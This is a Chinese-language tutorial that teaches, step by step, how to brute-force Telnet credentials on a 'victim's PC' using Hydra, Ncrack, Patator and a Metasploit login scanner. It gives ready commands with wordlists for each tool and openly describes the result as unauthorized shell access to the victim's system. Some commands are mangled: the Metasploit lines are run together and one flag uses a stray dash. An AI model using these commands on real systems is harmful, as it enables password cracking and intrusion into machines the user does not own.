在本文中将学习如何通过 Telnet 端口控制受害者的 PC。有多种方法可以做到这一点，让我们花时间学习所有这些，因为不同的情况需要不同的措施。

目录
Hydra
Ncrack
Patator
Metasploit

1. Hydra

Hydra 通常是首选工具。它可以对 50 多种协议执行快速字典攻击，包括 telnet、ftp、http、https、smb、多个数据库等等

现在，我们需要选择一个单词列表。与任何字典攻击一样，词表是关键。Kali 内置了许多单词表。

运行以下命令

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.106 telnet

-L：表示用户名列表的路径
-P：表示密码列表的路径
如图所见，我们已成功获取 Telnet用户名xander和密码123。

2. Ncrack
Ncrack是一款高速网络认证破解工具。它旨在通过主动测试其所有主机和网络设备的密码错误来帮助公司保护其网络。

运行以下命令

ncrack -U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106:23

-U：表示用户名列表的路径
-P：表示密码列表的路径

如图所见，我们已成功获取 Telnet用户名xander和密码123。

3. Patator
Patator 是一个多用途的暴力破解工具，具有模块化设计和灵活的使用方式。它对于对 FTP、HTTP、SMB 等多个端口进行暴力攻击非常有用。

patator telnet_login host=192.168.1.106 inputs='FILE0\nFILE1' 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re='Username: | Password:'

从下面给出的图像中，可以观察到字典攻击的过程开始了，因此将获得受害者的用户名和密码。

4. Metasploit
该模块将在一系列机器上测试 telnet 登录并报告成功登录。如果已加载数据库插件并连接到数据库，此模块将记录成功的登录和主机，以便可以跟踪访问。

打开 Kali 终端类型 msfconsole 现在类型

use auxiliary/scanner/telnet/telnet_loginmsf exploit (telnet_login)>set rhosts 192.168.1.106 (远程主机IP)msf exploit (telnet_login)>set user_file /root/Desktop/user txtmsf exploit (telnet_login)>set pass_file /root/Desktop/pass.txtmsf exploit (telnet_login)>set stop_on_success truemsf exploit (telnet_login)> exploit
从下图可以看出，我们已经成功获取了 telnet 密码和用户名，此外，Metasploit 还提供了一个额外的好处，即提供远程系统命令 shell以未经授权访问受害者的系统。